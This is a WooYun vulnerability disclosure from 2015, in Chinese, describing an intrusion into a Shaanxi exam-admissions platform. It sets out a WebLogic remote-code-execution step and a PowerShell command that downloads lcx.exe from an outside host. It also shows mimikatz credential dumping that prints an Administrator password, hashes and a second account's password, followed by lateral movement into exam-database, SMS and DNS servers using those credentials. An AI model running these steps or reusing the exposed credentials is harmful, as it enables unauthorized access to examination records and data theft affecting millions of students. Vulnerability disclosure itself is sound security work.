当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163368

漏洞标题:陕西省某招生平台命令执行已入内网\可与学信网对接\疑似可修改高考成绩

相关厂商:陕西某招生考试信息管理与服务平台

漏洞作者: 路人甲

提交时间:2015-12-23 17:44

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-23: 细节已通知厂商并且等待厂商处理中
2015-12-27: 厂商已经确认,细节仅向厂商公开
2016-01-06: 细节向核心白帽子及相关领域专家公开
2016-01-16: 细节向普通白帽子公开
2016-01-26: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

有近5年来的考生信息,考生的试卷照片,数据库可被恶意攻击者修改,高考状元不是梦。

详细说明:

陕西招生考试信息管理与服务平台 **.**.**.**:80 问题是一个weblogic 的rce

�������� ��������:
   �����ض��� DNS ��׺ . . . . . . . :
   �������� IPv6 ��ַ. . . . . . . . : fe80::69a1:3b71:367a:d95a%14
   IPv4 ��ַ . . . . . . . . . . . . : **.**.**.**
   ��������  . . . . . . . . . . . . : **.**.**.**
   Ĭ������. . . . . . . . . . . . . : **.**.**.**
��������� isatap.{9A19BB55-766E-43E2-8061-2FB431852334}:
d:\weblogic\user_projects\domains\base_domain>dir /s banner_bg2.gif
dir /s banner_bg2.gif
 ������ D �еľ��� �¼Ӿ�
                        �������� 089A-0D1E
 d:\weblogic\user_projects\domains\base_domain\servers\Server-1\tmp\_WL_user\index\j5mj4p\war\images ��Ŀ¼
2008/12/03  18:35               155 banner_bg2.gif
               1 ���ļ�            155 �ֽ�
 d:\weblogic\user_projects\domains\base_domain\servers\Server-2\tmp\_WL_user\index\383lbc\war\images ��Ŀ¼
2008/12/03  18:35               155 banner_bg2.gif


网站在war里没有上shell,反弹cmd直接poweshell 下载lcx,和mimikatz

powershell -command "&{$p = New-Object System.Net.WebClient;$p.DownloadFile('http://133.1xx/h_/lcx.exe' ,'d:\weblogic\user_projects\domains\base_domain\tmp\ps.txt');}"


先抓密码

mimikatz.exe  privilege::debug sekurlsa::logonpasswords exit


Authentication Id : 0 ; 555400 (00000000:00087988)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-B1S6BP0OQPV
Logon Server      : WIN-B1S6BP0OQPV
Logon Time        : 2015/12/1 13:59:17
SID               : S-1-5-21-1281860079-3134689854-615910783-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-B1S6BP0OQPV
         * LM       : 83b3f063e6fb7f7caad3b435b51404ee
         * NTLM     : d5736b3075109b364f9298152054d717
         * SHA1     : f9460b228768ce2546494652285c64f3e3f8cbf9
        tspkg :
         * Username : Administrator
         * Domain   : WIN-B1S6BP0OQPV
         * Password : zs1g*MM
        wdigest :
         * Username : Administrator
         * Domain   : WIN-B1S6BP0OQPV
         * Password : zs1g*MM
        kerberos :
         * Username : Administrator
         * Domain   : WIN-B1S6BP0OQPV
         * Password : zs1g*MM
        ssp :
        credman :
         [00000000]
         * Username : WIN-B1S6BP0OQPV\user1
         * Domain   : **.**.**.**
         * Password : a12345
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-B1S6BP0OQPV$
Domain            : WORKGROUP


然后看本地3389开了,就不用自己开了
lcx转发3389到vps上,本地连接vps
lcx中转到vps,连接vps

Capture3.PNG


11.png


Capture4.PNG


这个服务器除了5个weblogci server 网站源码 数据库连接密码暂时不想找。
看内网机器

d:\weblogic\user_projects\domains\base_domain\tmp>net view
net view
����������            ע��
-------------------------------------------------------------------------------
\\CHINESE-46CF777
\\DAVID-PC
\\EMC_NAS              EMC-SNAS:T**.**.**.**
\\KSZXN8500            N8000
\\PC-20130124SLBW
\\SERVER3
\\SMS
\\WINDOWS-AVRBD6J
\\WINDOWS-SS87Q2M
\\WINDOWS-ZK1
\\X3650M2_4
\\XB-20150819KUAT
\\XXC-5-PC
\\XXC-HP2
����ɹ���ɡ�


SMS 和SERVER3 显然是服务器嘛
远程桌面SMS,尝试几个弱口令不成功,然后尝试前边抓出来的密码,administer登录成功
发现SMS是个短信网关系统,里边有近几年的高考数据库文件

kaoshiku1.png


顺便登录一下SERVER3 用那个密码
登入的时候ie开着,估计开发者刚离开
开了一个学信网管理系统已经登录的窗口,这里可以查全国的高考数据

全国考试数据库.png


而且还有一个各省和学信网数据对接的文档

全国高考.png


漏洞证明:

陕西省的高考数据就是从这里录入和统计筛选的,
我们看15年的统计上报

QQ截图20151222000539.png


看到ip地址 **.**.**.**的共享 尝试user1 a12345 成功认证,找到过去4年的高考数据

QQ截图20151222000623.png


这个服务器上的oracle是存放考试数据的核心系统,装了2个oracle服务。

QQ截图20151221234555.png


找到一个账号文件,列表文件上边有20多个服务器账号(这里不贴了,都是共网的,求不查水表,什么都没碰),我随便登录几个
dns 服务器的

history.png


250个节点(主机)的负载均衡,都是在枢纽机房的

250个服务器.png


最后一起统计一下15年的高考数据

15年2.png


总共30W+

15年.png


这是普招,加上其他什么成人教育呀5年(11-15)的数据足有200W+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-12-27 22:25

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无